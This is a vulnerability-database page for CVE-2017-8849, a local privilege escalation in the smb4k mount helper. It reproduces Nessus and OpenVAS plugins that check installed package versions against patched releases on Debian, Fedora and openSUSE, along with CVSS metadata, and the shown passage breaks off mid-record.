Search...

Debian DSA-3951-1 : smb4k - security update

2017-08-23T00:00:00

ID DEBIAN_DSA-3951.NASL
Type nessus
Reporter This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2017-08-23T00:00:00

Description

Sebastian Krahmer discovered that a programming error in the mount helper binary of the Smb4k Samba network share browser may result in local privilege escalation.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Debian Security Advisory DSA-3951. The text 
# itself is copyright (C) Software in the Public Interest, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(102684);
  script_version("3.5");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");

  script_cve_id("CVE-2017-8849");
  script_xref(name:"DSA", value:"3951");

  script_name(english:"Debian DSA-3951-1 : smb4k - security update");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Debian host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Sebastian Krahmer discovered that a programming error in the mount
helper binary of the Smb4k Samba network share browser may result in
local privilege escalation."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://packages.debian.org/source/jessie/smb4k"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.debian.org/security/2017/dsa-3951"
  );
  script_set_attribute(
    attribute:"solution", 
    value:
"Upgrade the smb4k packages.

For the oldstable distribution (jessie), this problem has been fixed
in version 1.2.1-2~deb8u1."
  );
  script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:smb4k");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2017/08/22");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/08/23");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}


include("audit.inc");
include("debian_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;
if (deb_check(release:"8.0", prefix:"smb4k", reference:"1.2.1-2~deb8u1")) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "DEBIAN_DSA-3951.NASL", "bulletinFamily": "scanner", "title": "Debian DSA-3951-1 : smb4k - security update", "description": "Sebastian Krahmer discovered that a programming error in the mount\nhelper binary of the Smb4k Samba network share browser may result in\nlocal privilege escalation.", "published": "2017-08-23T00:00:00", "modified": "2017-08-23T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/102684", "reporter": "This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://packages.debian.org/source/jessie/smb4k", "https://www.debian.org/security/2017/dsa-3951"], "cvelist": ["CVE-2017-8849"], "type": "nessus", "lastseen": "2021-01-06T09:50:38", "edition": 25, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-8849"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851555", "OPENVAS:1361412562310703951", "OPENVAS:1361412562310872694", "OPENVAS:1361412562310891002", "OPENVAS:1361412562310872697"]}, {"type": "fedora", "idList": ["FEDORA:EA4816048681", "FEDORA:8DC72601E838", "FEDORA:E6C176051745"]}, {"type": "nessus", "idList": ["FEDORA_2017-ACEB424894.NASL", "GENTOO_GLSA-201705-14.NASL", "FEDORA_2017-F7849E04F4.NASL", "OPENSUSE-2017-595.NASL", "FEDORA_2017-2CC18E2B3B.NASL", "DEBIAN_DLA-1002.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3951-1:6632E", "DEBIAN:DLA-1002-1:1EBFE"]}, {"type": "gentoo", "idList": ["GLSA-201705-14"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:1343-1"]}, {"type": "archlinux", "idList": ["ASA-201705-11"]}, {"type": "zdt", "idList": ["1337DAY-ID-27821"]}, {"type": "exploitdb", "idList": ["EDB-ID:42053"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142638"]}], "modified": "2021-01-06T09:50:38", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-01-06T09:50:38", "rev": 2}, "vulnersScore": 6.7}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3951. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102684);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-8849\");\n script_xref(name:\"DSA\", value:\"3951\");\n\n script_name(english:\"Debian DSA-3951-1 : smb4k - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer discovered that a programming error in the mount\nhelper binary of the Smb4k Samba network share browser may result in\nlocal privilege escalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/smb4k\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3951\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the smb4k packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1.2.1-2~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"smb4k\", reference:\"1.2.1-2~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "pluginID": "102684", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:smb4k"], "scheme": null, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}}

{"cve": [{"lastseen": "2021-02-02T06:36:51", "description": "smb4k before 2.0.1 allows local users to gain root privileges by leveraging failure to verify arguments to the mount helper DBUS service.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-17T14:29:00", "title": "CVE-2017-8849", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8849"], "modified": "2019-03-18T16:41:00", "cpe": ["cpe:/a:smb4k_project:smb4k:2.0.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2017-8849", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8849", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:smb4k_project:smb4k:2.0.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-01-31T18:27:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-05-19T00:00:00", "id": "OPENVAS:1361412562310851555", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851555", "type": "openvas", "title": "openSUSE: Security Advisory for smb4k (openSUSE-SU-2017:1343-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851555\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-19 07:10:46 +0200 (Fri, 19 May 2017)\");\n script_cve_id(\"CVE-2017-8849\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for smb4k (openSUSE-SU-2017:1343-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'smb4k'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for smb4k fixes the following issues:\n\n - Disabled dbus service and polkit rules, because this version of smb4k\n has a local root exploit issue (boo#1036245, CVE-2017-8849). Automatic\n mounting will no longer be possible to work around this security issue.\");\n\n script_tag(name:\"affected\", value:\"smb4k on openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1343-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"smb4k\", rpm:\"smb4k~1.2.1~3.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"smb4k-debuginfo\", rpm:\"smb4k-debuginfo~1.2.1~3.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"smb4k-debugsource\", rpm:\"smb4k-debugsource~1.2.1~3.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"smb4k-doc\", rpm:\"smb4k-doc~1.2.1~3.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"smb4k-lang\", rpm:\"smb4k-lang~1.2.1~3.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-05-23T00:00:00", "id": "OPENVAS:1361412562310872697", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872697", "type": "openvas", "title": "Fedora Update for smb4k FEDORA-2017-aceb424894", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for smb4k FEDORA-2017-aceb424894\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872697\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-23 07:14:27 +0200 (Tue, 23 May 2017)\");\n script_cve_id(\"CVE-2017-8849\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for smb4k FEDORA-2017-aceb424894\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'smb4k'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"smb4k on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-aceb424894\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A5TLW2CHDKPEDQHHE62O5OJP5FU3VUO5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"smb4k\", rpm:\"smb4k~1.2.2~3.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:07:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "description": "Sebastian Krahmer from SUSE discovered that smb4k, a Samba (SMB) share\nadvanced browser, contains a logic flaw in which the mount helper binary\ndoes not properly verify the mount command it is being asked to run.\n\nThis allows local users to call any other binary as root.\n\nThe issue is resolved by backporting version 1.2.1-2 from Debian 9\n", "modified": "2020-01-29T00:00:00", "published": "2018-01-29T00:00:00", "id": "OPENVAS:1361412562310891002", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891002", "type": "openvas", "title": "Debian LTS: Security Advisory for smb4k (DLA-1002-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891002\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-8849\");\n script_name(\"Debian LTS: Security Advisory for smb4k (DLA-1002-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-29 00:00:00 +0100 (Mon, 29 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/06/msg00031.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"smb4k on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1.2.1-2~deb7u1.\n\nWe recommend that you upgrade your smb4k packages.\");\n\n script_tag(name:\"summary\", value:\"Sebastian Krahmer from SUSE discovered that smb4k, a Samba (SMB) share\nadvanced browser, contains a logic flaw in which the mount helper binary\ndoes not properly verify the mount command it is being asked to run.\n\nThis allows local users to call any other binary as root.\n\nThe issue is resolved by backporting version 1.2.1-2 from Debian 9\n'Stretch'.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"smb4k\", ver:\"1.2.1-2~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-05-21T00:00:00", "id": "OPENVAS:1361412562310872694", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872694", "type": "openvas", "title": "Fedora Update for smb4k FEDORA-2017-2cc18e2b3b", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for smb4k FEDORA-2017-2cc18e2b3b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872694\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-21 07:16:39 +0200 (Sun, 21 May 2017)\");\n script_cve_id(\"CVE-2017-8849\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for smb4k FEDORA-2017-2cc18e2b3b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'smb4k'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"smb4k on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-2cc18e2b3b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KRE6NA5IJ7WI4PPZTYCLCQQSXGHSSU2B\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"smb4k\", rpm:\"smb4k~1.2.2~3.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "description": "Sebastian Krahmer discovered that a programming error in the mount\nhelper binary of the Smb4k Samba network share browser may result in\nlocal privilege escalation.", "modified": "2019-03-18T00:00:00", "published": "2017-08-22T00:00:00", "id": "OPENVAS:1361412562310703951", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703951", "type": "openvas", "title": "Debian Security Advisory DSA 3951-1 (smb4k - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3951.nasl 14280 2019-03-18 14:50:45Z cfischer $\n#\n# Auto-generated from advisory DSA 3951-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703951\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-8849\");\n script_name(\"Debian Security Advisory DSA 3951-1 (smb4k - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-22 00:00:00 +0200 (Tue, 22 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3951.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"smb4k on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 1.2.1-2~deb8u1.\n\nWe recommend that you upgrade your smb4k packages.\");\n script_tag(name:\"summary\", value:\"Sebastian Krahmer discovered that a programming error in the mount\nhelper binary of the Smb4k Samba network share browser may result in\nlocal privilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"smb4k\", ver:\"1.2.1-2~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8849"], "description": "Smb4K is an SMB/CIFS share browser for KDE. It uses the Samba software suit e to access the SMB/CIFS shares of the local network neighborhood. Its purpose i s to provide a program that's easy to use and has as many features as possible. ", "modified": "2017-05-20T12:32:34", "published": "2017-05-20T12:32:34", "id": 